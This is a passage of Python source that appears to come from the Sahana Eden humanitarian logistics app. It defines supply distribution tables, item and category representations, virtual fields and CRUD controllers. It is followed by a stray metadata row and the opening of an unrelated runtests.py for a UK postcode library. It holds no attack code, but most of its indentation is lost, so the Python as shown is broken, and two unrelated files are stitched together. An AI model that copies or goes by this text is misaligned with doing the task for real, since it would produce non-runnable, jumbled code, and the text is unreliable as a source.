requires = IS_NOT_IN_DB(db,
"supply_distribution_item.name",
),
),
*s3_meta_fields())
# CRUD Strings
ADD_ITEM = T("Add Distribution Item")
crud_strings[tablename] = Storage(
label_create = ADD_ITEM,
title_display = T("Distribution Item"),
title_list = T("Distribution Items"),
title_update = T("Edit Distribution Item"),
label_list_button = T("List Distribution Items"),
msg_record_created = T("Distribution Item Added"),
msg_record_modified = T("Distribution Item Updated"),
msg_record_deleted = T("Distribution Item Deleted"),
msg_list_empty = T("No Distribution Items Found")
)
# Resource Configuration
configure(tablename,
onaccept = self.supply_distribution_item_onaccept,
super_entity = ("stats_parameter", "supply_item_entity"),
)
# ---------------------------------------------------------------------
# Distribution: actual distribution of a supply item
#
tablename = "supply_distribution"
define_table(tablename,
# Instance
super_link("data_id", "stats_data"),
# Component (each Distribution can link to a single Project)
#self.project_project_id(),
# Component (each Distribution can link to a single Activity)
self.project_activity_id(),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Item"),
instance_types = ("supply_distribution_item",),
represent = S3Represent(lookup="stats_parameter"),
readable = True,
writable = True,
empty = False,
comment = S3PopupLink(c = "supply",
f = "distribution_item",
vars = {"prefix": "supply",
"child": "parameter_id"},
title=ADD_ITEM,
),
),
self.gis_location_id(),
Field("value", "integer",
label = T("Quantity"),
requires = IS_INT_IN_RANGE(0, None),
represent = lambda v: \
IS_INT_AMOUNT.represent(v),
),
s3_date("date",
#empty = False,
label = T("Start Date"),
),
s3_date("end_date",
#empty = False,
label = T("End Date"),
start_field = "supply_distribution_date",
default_interval = 12,
),
#self.stats_source_id(),
Field.Method("year", self.supply_distribution_year),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_DIST = T("Add Distribution")
crud_strings[tablename] = Storage(
label_create = ADD_DIST,
title_display = T("Distribution Details"),
title_list = T("Distributions"),
title_update = T("Edit Distribution"),
title_report = T("Distribution Report"),
label_list_button = T("List Distributions"),
msg_record_created = T("Distribution Added"),
msg_record_modified = T("Distribution Updated"),
msg_record_deleted = T("Distribution Deleted"),
msg_list_empty = T("No Distributions Found")
)
# Reusable Field
#represent = S3Represent(lookup=tablename,
# field_sep = " ",
# fields=["value", "parameter_id"])
# Resource Configuration
# ---------------------------------------------------------------------
def year_options():
"""
returns a dict of the options for the year virtual field
used by the search widget
orderby needed for postgres
"""
table = db.supply_distribution
query = (table.deleted == False)
min_field = table.date.min()
date_min = db(query).select(min_field,
orderby=min_field,
limitby=(0, 1)
).first()
start_year = date_min and date_min[min_field].year
max_field = table.date.max()
date_max = db(query).select(max_field,
orderby=max_field,
limitby=(0, 1)
).first()
last_start_year = date_max and date_max[max_field].year
max_field = table.end_date.max()
date_max = db(query).select(max_field,
orderby=max_field,
limitby=(0, 1)
).first()
last_end_year = date_max and date_max[max_field].year
end_year = max(last_start_year, last_end_year)
if not start_year or not end_year:
return {start_year:start_year} or {end_year:end_year}
years = {}
for year in xrange(start_year, end_year + 1):
years[year] = year
return years
# Which levels of Hierarchy are we using?
levels = current.gis.get_relevant_hierarchy_levels()
# Normally only used in Report
filter_widgets = [
#S3TextFilter([#"item_id$name",
# if settings.get_project_projects():
# "activity_id$project_id$name",
# "activity_id$project_id$code",
# "location_id",
# "comments"
# ],
# label = T("Search Distributions"),
# ),
S3LocationFilter("location_id",
levels=levels,
widget="multiselect"
),
S3OptionsFilter("activity_id$activity_organisation.organisation_id",
widget="multiselect"
),
S3OptionsFilter("parameter_id",
label = T("Item"),
widget="multiselect"
),
# @ToDo: Range Slider using start_date & end_date
#S3DateFilter("date",
# )
# @ToDo: OptionsFilter working with Lazy VF
#S3OptionsFilter("year",
# label=T("Year"),
# options = year_options,
# widget="multiselect",
# hidden=True,
# ),
]
list_fields = ["activity_id$activity_organisation.organisation_id",
(T("Item"), "parameter_id"),
"value",
(T("Year"), "year"),
]
report_fields = ["activity_id$activity_organisation.organisation_id",
(T("Item"), "parameter_id"),
"parameter_id",
(T("Year"), "year"),
]
if settings.get_project_sectors():
report_fields.append("activity_id$sector_activity.sector_id")
filter_widgets.insert(0,
S3OptionsFilter("activity_id$sector_activity.sector_id",
# Doesn't allow translation
#represent="%(name)s",
widget="multiselect",
#hidden=True,
))
if settings.get_project_hazards():
report_fields.append("activity_id$project_id$hazard.name")
if settings.get_project_projects():
list_fields.insert(0, "activity_id$project_id")
report_fields.append("activity_id$project_id")
filter_widgets.append(
S3OptionsFilter("activity_id$project_id",
widget="multiselect"
),
#S3OptionsFilter("activity_id$project_id$organisation_id",
# label = T("Lead Organization"),
# widget="multiselect"
# ),
#S3OptionsFilter("activity_id$project_id$partner.organisation_id",
# label = T("Partners"),
# widget="multiselect"),
#S3OptionsFilter("activity_id$project_id$donor.organisation_id",
# label = T("Donors"),
# location_level="L1",
# widget="multiselect")
)
if settings.get_project_themes():
report_fields.append("activity_id$project_id$theme.name")
filter_widgets.append(
S3OptionsFilter("activity_id$project_id$theme_project.theme_id",
# Doesn't allow translation
#represent="%(name)s",
widget="multiselect",
#hidden=True,
))
for level in levels:
lfield = "location_id$%s" % level
list_fields.append(lfield)
report_fields.append(lfield)
if "L0" in levels:
default_row = "location_id$L0"
elif "L1" in levels:
default_row = "location_id$L1"
else:
default_row = "activity_id$activity_organisation.organisation_id"
report_options = Storage(rows = report_fields,
cols = report_fields,
fact = [(T("Number of Items"), "sum(value)"),
],
defaults = Storage(rows = default_row,
cols = "parameter_id",
fact = "sum(value)",
totals = True,
),
# Needed for Virtual Field
extra_fields = ["date",
"end_date",
]
)
configure(tablename,
context = {"location": "location_id",
"organisation": "activity_id$organisation_activity.organisation_id",
},
deduplicate = S3Duplicate(primary = ("activity_id",
"location_id",
"parameter_id",
),
),
filter_widgets = filter_widgets,
onaccept = self.supply_distribution_onaccept,
report_options = report_options,
super_entity = "stats_data",
)
# Pass names back to global scope (s3.*)
return {}
# ---------------------------------------------------------------------
@staticmethod
def supply_distribution_item_onaccept(form):
"""
Update supply_distribution_item name from supply_item_id
"""
db = current.db
dtable = db.supply_distribution_item
ltable = db.supply_item
record_id = form.vars.id
query = (dtable.id == record_id) & \
(ltable.id == dtable.item_id)
item = db(query).select(dtable.name,
ltable.name,
limitby=(0, 1)).first()
if item and not item[dtable.name]:
db(dtable.id == record_id).update(name = item[ltable.name])
return
# ---------------------------------------------------------------------
@staticmethod
def supply_distribution_onaccept(form):
"""
Set supply_distribution location, start_date and end_date
from activity
This is for when the data is created after the project_activity
- CSV imports into project_activity
- Inline forms in project_activity
"""
db = current.db
dtable = db.supply_distribution
record_id = form.vars.id
# Get the full record
record = db(dtable.id == record_id).select(dtable.activity_id,
dtable.location_id,
dtable.date,
dtable.end_date,
limitby=(0, 1)
).first()
try:
location_id = record.location_id
start_date = record.date
end_date = record.end_date
except:
# Exit Gracefully
current.log.warning("Cannot find Distribution: %s" % record_id)
return
activity_id = record.activity_id
if not activity_id:
# Nothing we can do
return
# Read Activity
atable = db.project_activity
activity = db(atable.id == activity_id).select(atable.location_id,
atable.date,
atable.end_date,
limitby=(0, 1)
).first()
try:
a_location_id = activity.location_id
a_start_date = activity.date
a_end_date = activity.end_date
except:
# Exit Gracefully
current.log.warning("Cannot find Activity: %s" % activity_id)
return
data = {}
if a_location_id and a_location_id != location_id:
data["location_id"] = a_location_id
if a_start_date and a_start_date != start_date:
data["date"] = a_start_date
if a_end_date and a_end_date != end_date:
data["end_date"] = a_end_date
if data:
# Update Distribution details
db(dtable.id == record_id).update(**data)
# ---------------------------------------------------------------------
@staticmethod
def supply_distribution_year(row):
""" Virtual field for the supply_distribution table """
if hasattr(row, "supply_distribution"):
row = row.supply_distribution
try:
date = row.date
except AttributeError:
date = None
try:
end_date = row.end_date
except AttributeError:
end_date = None
if not date and not end_date:
return []
elif not end_date:
return [date.year]
elif not date:
return [end_date.year]
else:
return list(xrange(date.year, end_date.year + 1))
# =============================================================================
class supply_ItemRepresent(S3Represent):
""" Representation of Supply Items """
def __init__(self,
translate=False,
show_link=False,
show_um=False,
multiple=False):
self.show_um = show_um
# Need a custom lookup to join with Brand
self.lookup_rows = self.custom_lookup_rows
fields = ["supply_item.id",
"supply_item.name",
"supply_item.model",
"supply_brand.name",
]
if show_um:
fields.append("supply_item.um")
super(supply_ItemRepresent,
self).__init__(lookup="supply_item",
fields=fields,
show_link=show_link,
translate=translate,
multiple=multiple)
# -------------------------------------------------------------------------
def custom_lookup_rows(self, key, values, fields=[]):
"""
Custom lookup method for item rows, does a
left join with the brand. Parameters
key and fields are not used, but are kept for API
compatibility reasons.
@param values: the supply_item IDs
"""
db = current.db
itable = current.s3db.supply_item
btable = db.supply_brand
left = btable.on(btable.id == itable.brand_id)
qty = len(values)
if qty == 1:
query = (itable.id == values[0])
limitby = (0, 1)
else:
query = (itable.id.belongs(values))
limitby = (0, qty)
rows = db(query).select(*self.fields,
left=left,
limitby=limitby)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the supply_item Row
"""
name = row["supply_item.name"]
model = row["supply_item.model"]
brand = row["supply_brand.name"]
fields = []
if name:
fields.append(name)
if model:
fields.append(model)
if brand:
fields.append(brand)
name = " - ".join(fields)
if self.show_um:
um = row["supply_item.um"]
if um:
name = "%s (%s)" % (name, um)
return s3_str(name)
# =============================================================================
class supply_ItemPackRepresent(S3Represent):
""" Representation of Supply Item Packs """
# -------------------------------------------------------------------------
def lookup_rows(self, key, values, fields=[]):
"""
Custom lookup method for item_pack rows, does a left join with
the item.
@param key: the primary key of the lookup table
@param values: the supply_item_pack IDs
@param fields: the fields to lookup (unused in this class,
retained for API compatibility)
"""
db = current.db
table = self.table
itable = db.supply_item
qty = len(values)
if qty == 1:
query = (key == values[0])
else:
query = (key.belongs(values))
left = itable.on(table.item_id == itable.id)
rows = db(query).select(table.id,
table.name,
table.quantity,
itable.um,
left=left,
limitby=(0, qty),
)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the Row (usually joined supply_item_pack/supply_item)
@todo: implement translate option
"""
try:
item = row.supply_item
pack = row.supply_item_pack
except AttributeError:
# Missing join (external query?)
item = {"um": "Piece"}
pack = row
name = pack.get("name")
if not name:
return current.messages.UNKNOWN_OPT
quantity = pack.get("quantity")
if quantity == 1 or quantity is None:
return name
else:
# Include pack description (quantity x units of measurement)
return "%s (%s x %s)" % (name, quantity, item.get("um"))
# =============================================================================
class supply_ItemCategoryRepresent(S3Represent):
""" Representation of Supply Item Categories """
def __init__(self,
translate=False,
show_link=False,
use_code=True,
multiple=False):
self.use_code = use_code
# Need a custom lookup to join with Parent/Catalog
self.lookup_rows = self.custom_lookup_rows
fields = ["supply_item_category.id",
"supply_item_category.name",
# Always-included since used as fallback if no name
"supply_item_category.code",
"supply_catalog.name",
"supply_parent_item_category.name",
"supply_grandparent_item_category.name",
"supply_grandparent_item_category.parent_item_category_id",
]
super(supply_ItemCategoryRepresent,
self).__init__(lookup="supply_item_category",
fields=fields,
show_link=show_link,
translate=translate,
multiple=multiple)
# -------------------------------------------------------------------------
def custom_lookup_rows(self, key, values, fields=[]):
"""
Custom lookup method for item category rows, does a
left join with the parent category. Parameters
key and fields are not used, but are kept for API
compatibility reasons.
@param values: the supply_item_category IDs
"""
db = current.db
table = current.s3db.supply_item_category
ctable = db.supply_catalog
ptable = db.supply_item_category.with_alias("supply_parent_item_category")
gtable = db.supply_item_category.with_alias("supply_grandparent_item_category")
left = [ctable.on(ctable.id == table.catalog_id),
ptable.on(ptable.id == table.parent_item_category_id),
gtable.on(gtable.id == ptable.parent_item_category_id),
]
qty = len(values)
if qty == 1:
query = (table.id == values[0])
limitby = (0, 1)
else:
query = (table.id.belongs(values))
limitby = (0, qty)
rows = db(query).select(*self.fields,
left=left,
limitby=limitby)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the supply_item_category Row
"""
use_code = self.use_code
name = row["supply_item_category.name"]
code = row["supply_item_category.code"]
catalog = row["supply_catalog.name"]
parent = row["supply_parent_item_category.name"]
if use_code:
name = code
elif not name:
name = code
if parent:
if use_code:
# Compact format
sep = "-"
else:
sep = " - "
name = "%s%s%s" % (name, sep, parent)
grandparent = row["supply_grandparent_item_category.name"]
if grandparent:
name = "%s%s%s" % (name, sep, grandparent)
# Check for Great-grandparent
# Trade-off "all in 1 row" vs "too many joins"
greatgrandparent = row["supply_grandparent_item_category.parent_item_category_id"]
if greatgrandparent:
# Assume no more than 6 levels of interest
db = current.db
table = current.s3db.supply_item_category
ptable = db.supply_item_category.with_alias("supply_parent_item_category")
gtable = db.supply_item_category.with_alias("supply_grandparent_item_category")
left = [ptable.on(ptable.id == table.parent_item_category_id),
gtable.on(gtable.id == ptable.parent_item_category_id),
]
query = (table.id == greatgrandparent)
fields = [table.name,
table.code,
ptable.name,
ptable.code,
gtable.name,
gtable.code,
]
row = db(query).select(*fields,
left=left,
limitby=(0, 1)).first()
if row:
if use_code:
greatgrandparent = row["supply_item_category.code"]
greatgreatgrandparent = row["supply_parent_item_category.code"]
else:
greatgrandparent = row["supply_item_category.name"] or row["supply_item_category.code"]
greatgreatgrandparent = row["supply_parent_item_category.name"] or row["supply_parent_item_category.code"]
name = "%s%s%s" % (name, sep, greatgrandparent)
if greatgreatgrandparent:
name = "%s%s%s" % (name, sep, greatgreatgrandparent)
if use_code:
greatgreatgreatgrandparent = row["supply_grandparent_item_category.code"]
else:
greatgreatgreatgrandparent = row["supply_grandparent_item_category.name"] or row["supply_grandparent_item_category.code"]
if greatgreatgreatgrandparent:
name = "%s%s%s" % (name, sep, greatgreatgreatgrandparent)
if catalog:
name = "%s > %s" % (catalog, name)
return s3_str(name)
# =============================================================================
def item_um_from_name(name):
"""
Retrieve the Unit of Measure from a name
"""
for um_pattern in um_patterns:
m = re.search(um_pattern, name)
if m:
um = m.group(1).strip()
            # Strip the unit of measure from the name
            name = re.sub(um_pattern, "", name)
            # Remove any trailing comma and whitespace
name = re.sub("(,)$", "", name).strip()
return (name, um)
return (name, None)
# =============================================================================
def supply_catalog_rheader(r):
""" Resource Header for Catalogs """
if r.representation == "html":
catalog = r.record
if catalog:
T = current.T
tabs = [(T("Edit Details"), None),
(T("Categories"), "item_category"),
(T("Items"), "catalog_item"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR(TH("%s: " % table.name.label),
catalog.name,
),
TR(TH("%s: " % table.organisation_id.label),
table.organisation_id.represent(catalog.organisation_id),
),
),
rheader_tabs
)
return rheader
return None
# =============================================================================
def supply_item_rheader(r):
""" Resource Header for Items """
if r.representation == "html":
item = r.record
if item:
T = current.T
tabs = [(T("Edit Details"), None),
(T("Packs"), "item_pack"),
(T("Alternative Items"), "item_alt"),
(T("In Inventories"), "inv_item"),
(T("Requested"), "req_item"),
(T("In Catalogs"), "catalog_item"),
]
if item.kit == True:
tabs.append((T("Kit Items"), "kit_item"))
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
rheader = DIV(TABLE(TR( TH("%s: " % table.name.label),
item.name,
),
TR( TH("%s: " % table.brand_id.label),
table.brand_id.represent(item.brand_id),
),
TR( TH("%s: " % table.model.label),
item.model or current.messages["NONE"],
),
),
rheader_tabs
)
return rheader
return None
# =============================================================================
class SupplyItemPackQuantity(object):
""" Virtual Field for pack_quantity """
def __init__(self, tablename):
self.tablename = tablename
def __call__(self, row):
default = 0
tablename = self.tablename
if hasattr(row, tablename):
row = object.__getattribute__(row, tablename)
try:
item_pack_id = row.item_pack_id
except AttributeError:
return default
if item_pack_id:
return item_pack_id.quantity
else:
return default
# =============================================================================
def supply_item_entity_category(row):
""" Virtual field: category """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
try:
item_id = row.item_id
except AttributeError:
return None
table = current.s3db.supply_item
query = (table.id == item_id)
record = current.db(query).select(table.item_category_id,
limitby=(0, 1)).first()
if record:
return table.item_category_id.represent(record.item_category_id)
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
def supply_item_entity_country(row):
""" Virtual field: country """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
itable = s3db[instance_type]
ltable = s3db.gis_location
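    # Each instance type needs a different join path from the item record to
    # its site and the site's gis_location in order to read the country (L0)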
if instance_type == "inv_inv_item":
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(stable.site_id == itable.site_id) & \
(ltable.id == stable.location_id)
record = current.db(query).select(ltable.L0,
limitby=(0, 1)).first()
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.recv_id) & \
(stable.site_id == rtable.site_id) & \
(ltable.id == stable.location_id)
record = current.db(query).select(ltable.L0,
limitby=(0, 1)).first()
elif instance_type == "proc_plan_item":
ptable = s3db.proc_plan
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(ptable.id == itable.plan_id) & \
(stable.site_id == ptable.site_id) & \
(ltable.id == stable.location_id)
record = current.db(query).select(ltable.L0,
limitby=(0, 1)).first()
else:
# @ToDo: Assets and req_items
record = None
if record:
return record.L0 or current.T("Unknown")
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
def supply_item_entity_organisation(row):
""" Virtual field: organisation """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
organisation_represent = s3db.org_OrganisationRepresent(acronym=False)
itable = s3db[instance_type]
if instance_type == "inv_inv_item":
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(stable.site_id == itable.site_id)
record = current.db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
elif instance_type == "proc_plan_item":
rtable = s3db.proc_plan
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.plan_id) & \
(stable.site_id == rtable.site_id)
record = current.db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
stable = s3db.org_site
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.recv_id) & \
(stable.site_id == rtable.site_id)
record = current.db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
else:
# @ToDo: Assets and req_items
record = None
if record:
return organisation_represent(record.organisation_id)
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
def supply_item_entity_contacts(row):
""" Virtual field: contacts (site_id) """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
db = current.db
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
itable = s3db[instance_type]
if instance_type == "inv_inv_item":
query = (itable[ekey] == entity_id)
record = db(query).select(itable.site_id,
limitby=(0, 1)).first()
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.recv_id)
record = db(query).select(rtable.site_id,
limitby=(0, 1)).first()
elif instance_type == "proc_plan_item":
ptable = s3db.proc_plan
query = (itable[ekey] == entity_id) & \
(ptable.id == itable.plan_id)
record = db(query).select(ptable.site_id,
limitby=(0, 1)).first()
else:
# @ToDo: Assets and req_items
record = None
default = current.messages["NONE"]
if not record:
return default
otable = s3db.org_office
query = (otable.site_id == record.site_id)
office = db(query).select(otable.id,
otable.comments,
limitby=(0, 1)).first()
if office:
if current.request.extension in ("xls", "pdf"):
if office.comments:
return office.comments
else:
return default
elif office.comments:
comments = s3_comments_represent(office.comments,
show_link=False)
else:
comments = default
return A(comments,
_href = URL(f="office", args = [office.id]))
else:
return default
# -------------------------------------------------------------------------
def supply_item_entity_status(row):
""" Virtual field: status """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
db = current.db
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
itable = s3db[instance_type]
status = None
if instance_type == "inv_inv_item":
query = (itable[ekey] == entity_id)
record = current.db(query).select(itable.expiry_date,
limitby=(0, 1)).first()
if record:
T = current.T
if record.expiry_date:
status = T("Stock Expires %(date)s") % \
dict(date=record.expiry_date)
else:
status = T("In Stock")
elif instance_type == "proc_plan_item":
rtable = s3db.proc_plan
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.plan_id)
record = current.db(query).select(rtable.eta,
limitby=(0, 1)).first()
if record:
T = current.T
if record.eta:
status = T("Planned %(date)s") % dict(date=record.eta)
else:
status = T("Planned Procurement")
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.send_inv_item_id)
record = current.db(query).select(rtable.eta,
limitby=(0, 1)).first()
if record:
T = current.T
if record.eta:
status = T("Order Due %(date)s") % dict(date=record.eta)
else:
status = T("On Order")
else:
# @ToDo: Assets and req_items
return current.messages["NONE"]
return status or current.messages["NONE"]
# =============================================================================
def supply_item_controller():
""" RESTful CRUD controller """
s3 = current.response.s3
s3db = current.s3db
def prep(r):
if r.component:
if r.component_name == "inv_item":
# Inventory Items need proper accountability so are edited through inv_adj
s3db.configure("inv_inv_item",
listadd=False,
deletable=False)
# Filter to just item packs for this Item
inv_item_pack_requires = IS_ONE_OF(current.db,
"supply_item_pack.id",
s3db.supply_item_pack_represent,
sort=True,
filterby = "item_id",
filter_opts = (r.record.id,),
)
s3db.inv_inv_item.item_pack_id.requires = inv_item_pack_requires
elif r.component_name == "req_item":
# This is a report not a workflow
s3db.configure("req_req_item",
listadd=False,
deletable=False)
# Needs better workflow as no way to add the Kit Items
# else:
# caller = current.request.get_vars.get("caller", None)
# if caller == "inv_kit_item_id":
# field = r.table.kit
# field.default = True
# field.readable = field.writable = False
elif r.representation == "xls":
# Use full Category names in XLS output
s3db.supply_item.item_category_id.represent = \
supply_ItemCategoryRepresent(use_code=False)
return True
s3.prep = prep
return current.rest_controller("supply", "item",
rheader = supply_item_rheader,
)
# =============================================================================
def supply_item_entity_controller():
"""
RESTful CRUD controller
- consolidated report of inv_item, recv_item & proc_plan_item
@ToDo: Migrate JS to Static as part of migrating this to an
S3Search Widget
"""
T = current.T
db = current.db
s3db = current.s3db
s3 = current.response.s3
settings = current.deployment_settings
tablename = "supply_item_entity"
table = s3db[tablename]
# CRUD strings
s3.crud_strings[tablename] = Storage(
label_create = T("Add Item"),
title_display = T("Item Details"),
title_list = T("Items"),
title_update = T("Edit Item"),
label_list_button = T("List Items"),
label_delete_button = T("Delete Item"),
msg_record_created = T("Item added"),
msg_record_modified = T("Item updated"),
msg_record_deleted = T("Item deleted"),
msg_list_empty = T("No Items currently registered"))
table.category = Field.Method("category",
supply_item_entity_category)
table.country = Field.Method("country",
supply_item_entity_country)
table.organisation = Field.Method("organisation",
supply_item_entity_organisation)
table.contacts = Field.Method("contacts",
supply_item_entity_contacts)
table.status = Field.Method("status",
supply_item_entity_status)
# Allow VirtualFields to be sortable/searchable
s3.no_sspag = True
s3db.configure(tablename,
deletable = False,
insertable = False,
# @ToDo: Allow VirtualFields to be used to Group Reports
#report_groupby = "category",
list_fields = [(T("Category"), "category"),
"item_id",
"quantity",
(T("Unit of Measure"), "item_pack_id"),
(T("Status"), "status"),
(current.messages.COUNTRY, "country"),
(T("Organization"), "organisation"),
#(T("Office"), "site"),
(T("Contacts"), "contacts"),
],
extra_fields = ["instance_type"],
)
def postp(r, output):
if r.interactive and not r.record:
# Provide some manual Filters above the list
rheader = DIV()
# Filter by Category
table = s3db.supply_item_category
etable = s3db.supply_item_entity
itable = s3db.supply_item
query = (etable.deleted == False) & \
(etable.item_id == itable.id) & \
(itable.item_category_id == table.id)
categories = db(query).select(table.id,
table.name,
distinct=True)
select = SELECT(_multiple="multiple", _id="category_dropdown")
for category in categories:
select.append(OPTION(category.name, _name=category.id))
rheader.append(DIV(B("%s:" % T("Filter by Category")),
BR(),
select,
_class="rfilter"))
# Filter by Status
select = SELECT(_multiple="multiple", _id="status_dropdown")
if settings.has_module("inv"):
select.append(OPTION(T("In Stock")))
select.append(OPTION(T("On Order")))
if settings.has_module("proc"):
select.append(OPTION(T("Planned Procurement")))
rheader.append(DIV(B("%s:" % T("Filter by Status")),
BR(),
select,
_class="rfilter"))
output["rheader"] = rheader
# Find Offices with Items
# @ToDo: Other Site types (how to do this as a big Join?)
table = s3db.org_office
otable = s3db.org_organisation
ltable = s3db.gis_location
fields = [ltable.L0,
#table.name,
otable.name]
query = (table.deleted == False) & \
(table.organisation_id == otable.id) & \
(ltable.id == table.location_id)
isites = []
rsites = []
psites = []
# @ToDo: Assets & Req_Items
# @ToDo: Try to do this as a Join?
if settings.has_module("inv"):
inv_itable = s3db.inv_inv_item
iquery = query & (inv_itable.site_id == table.site_id)
isites = db(iquery).select(distinct=True, *fields)
inv_ttable = s3db.inv_track_item
inv_rtable = s3db.inv_recv
rquery = query & (inv_ttable.send_inv_item_id == inv_rtable.id) & \
(inv_rtable.site_id == table.site_id)
rsites = db(rquery).select(distinct=True, *fields)
if settings.has_module("proc"):
proc_ptable = s3db.proc_plan
proc_itable = s3db.proc_plan_item
pquery = query & (proc_itable.plan_id == proc_ptable.id) & \
(proc_ptable.site_id == table.site_id)
psites = db(pquery).select(distinct=True, *fields)
sites = []
for site in isites:
if site not in sites:
sites.append(site)
for site in rsites:
if site not in sites:
sites.append(site)
for site in psites:
if site not in sites:
sites.append(site)
# Filter by Country
select = SELECT(_multiple="multiple", _id="country_dropdown")
countries = []
for site in sites:
country = site.org_office.L0
if country not in countries:
select.append(OPTION(country or T("Unknown")))
countries.append(country)
rheader.append(DIV(B("%s:" % T("Filter by Country")),
BR(),
select,
_class="rfilter"))
# Filter by Organisation
select = SELECT(_multiple="multiple", _id="organisation_dropdown")
orgs = []
for site in sites:
org = site.org_organisation.name
if org not in orgs:
select.append(OPTION(org or T("Unknown")))
orgs.append(org)
rheader.append(DIV(B("%s:" % T("Filter by Organization")),
BR(),
select,
_class="rfilter"))
# http://datatables.net/api#fnFilter
# Columns:
# 1 = Category
# 5 = Status (@ToDo: Assets & Req Items)
# 6 = Country
# 7 = Organisation
# Clear column filter before applying new one
#
# @ToDo: Hide options which are no longer relevant because
# of the other filters applied
#
s3.jquery_ready.append('''
function filterColumns(){
var oTable=$('#list').dataTable()
var values=''
$('#category_dropdown option:selected').each(function(){
values+=$(this).text()+'|'
})
var regex=(values==''?'':'^'+values.slice(0, -1)+'$')
oTable.fnFilter('',1,false)
oTable.fnFilter(regex,1,true,false)
values=''
$('#status_dropdown option:selected').each(function(){
if($(this).text()=="''' + T("On Order") + '''"){
values+=$(this).text()+'|'+"''' + T("Order") + '''.*"+'|'
}else if($(this).text()=="''' + T("Planned Procurement") + '''"){
values+="''' + T("Planned") + '''.*"+'|'
}else{
values+=$(this).text()+'|'+"''' + T("Stock") + '''.*"+'|'
}
})
var regex=(values==''?'':'^'+values.slice(0,-1)+'$')
oTable.fnFilter('',5,false)
oTable.fnFilter(regex,5,true,false)
values=''
$('#country_dropdown option:selected').each(function(){
values+=$(this).text()+'|'
})
var regex=(values==''?'':'^'+values.slice(0,-1)+'$')
oTable.fnFilter('',6,false)
oTable.fnFilter(regex,6,true,false)
values=''
$('#organisation_dropdown option:selected').each(function(){
values+=$(this).text()+'|'
})
var regex=(values==''? '':'^'+values.slice(0,-1)+'$')
oTable.fnFilter('',7,false)
oTable.fnFilter(regex,7,true,false)
}
$('#category_dropdown').change(function(){
filterColumns()
var values=[]
$('#category_dropdown option:selected').each(function(){
values.push($(this).attr('name'))
})
if(values.length){
$('#list_formats a').attr('href',function(){
var href=this.href.split('?')[0]+'?item_entity.item_id$item_category_id='+values[0]
for(i=1;i<=(values.length-1);i++){
href=href+','+values[i]
}
return href
})
}else{
$('#list_formats a').attr('href',function(){
return this.href.split('?')[0]
})
}
})
$('#status_dropdown').change(function(){
filterColumns()
})
$('#country_dropdown').change(function(){
filterColumns()
})
$('#organisation_dropdown').change(function(){
filterColumns()
})''')
return output
s3.postp = postp
output = current.rest_controller("supply", "item_entity",
hide_filter = True,
)
return output
# -------------------------------------------------------------------------
def supply_get_shipping_code(type, site_id, field):
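    """
        Generate the next shipping code of the form TYPE-SITECODE-NNNNNN,
        using the site's org_site code (or ### when unknown) and incrementing
        the highest existing reference found in the given field
    """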
db = current.db
if site_id:
table = current.s3db.org_site
site = db(table.site_id == site_id).select(table.code,
limitby=(0, 1)
).first()
if site:
scode = site.code
else:
scode = "###"
code = "%s-%s-" % (type, scode)
else:
code = "%s-###-" % (type)
number = 0
if field:
query = (field.like("%s%%" % code))
ref_row = db(query).select(field,
limitby=(0, 1),
orderby=~field).first()
if ref_row:
ref = ref_row(field)
number = int(ref[-6:])
return "%s%06d" % (code, number + 1)
# END =========================================================================
| mit | 6,612,580,975,636,968,000 | 38.39402 | 161 | 0.433469 | false |
alanjds/pyukpostcode | runtests.py | 1 | 2422 | #! /usr/bin/env python
from __future__ import print_function
import pytest
import sys
import os
import subprocess
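# Usage: ./runtests.py [--nolint | --lintonly] [--fast]
#                      [TestCase | test_function | TestCase.test_function] [pytest flags]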
PYTEST_ARGS = {
'default': ['tests', '--cov=ukpostcode'],
'fast': ['tests', '-q', '--cov=ukpostcode'],
}
FLAKE8_ARGS = ['ukpostcode', 'tests', '--ignore=E501', '--ignore=E262', '--max-line-length=120']
